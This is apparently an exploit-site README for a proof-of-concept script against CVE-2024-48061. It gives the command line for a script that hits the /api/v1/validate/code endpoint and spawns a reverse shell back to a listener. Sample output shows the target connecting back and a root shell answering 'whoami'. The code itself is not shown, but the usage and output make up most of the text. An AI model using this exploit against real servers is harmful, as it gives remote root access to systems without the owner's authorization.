## https://sploitus.com/exploit?id=D5D265FA-020C-5628-92C7-5A838E4DB754
# CVE-2024-48061
## CVE-2024-48061 - poc
## Usage
```shell
python3 poc.py -i <web_ip> -p <web_port> -l <listener_ip> -lp <listener_port>
```
## Description
This script exploits a vulnerable API endpoint at `/api/v1/validate/code` on the target web server.
It first verifies the presence of the vulnerable path, then starts a TCP listener on the specified
listener IP and port. Once the listener is ready, it sends a specially crafted payload to the target
to spawn a reverse shell connecting back to the listener.
- The script handles interactive shell communication, and cleanly exits on Ctrl+C without error messages.
- Output is color-coded for easier reading:
- Green: Success/info messages
- Yellow: Informational steps like sending payload
- Red: Errors or failures
- If the vulnerable path does not exist, it reports that and exits immediately.
- If the listener port is in use, the script suggests trying a different port and exits.
## Example
- Successful attempt
```
python3 poc.py -i 192.168.0.2 -p 7860 -l 192.168.0.3 -lp 6666
[+] Listener started on 192.168.0.3:6666, waiting for connection...
[+] Sending payload to http://192.168.0.2:7860/api/v1/validate/code
[+] Connection from 192.168.0.2:37946 received!
[+] PWNed 192.168.0.2:37946
[*] Why do programmers prefer dark mode? Because light attracts bugs!
[*] Interactive shell:
whoami
root
exit
^C
[*] Exiting shell.
```
- Un-Successful attempt
```
python3 poc.py -i 192.168.0.2 -p 7860 -l 192.168.0.3 -lp 6666
[-] Vulnerability doesn't exist at http://192.168.0.2:7860/api/v1/validate/code
```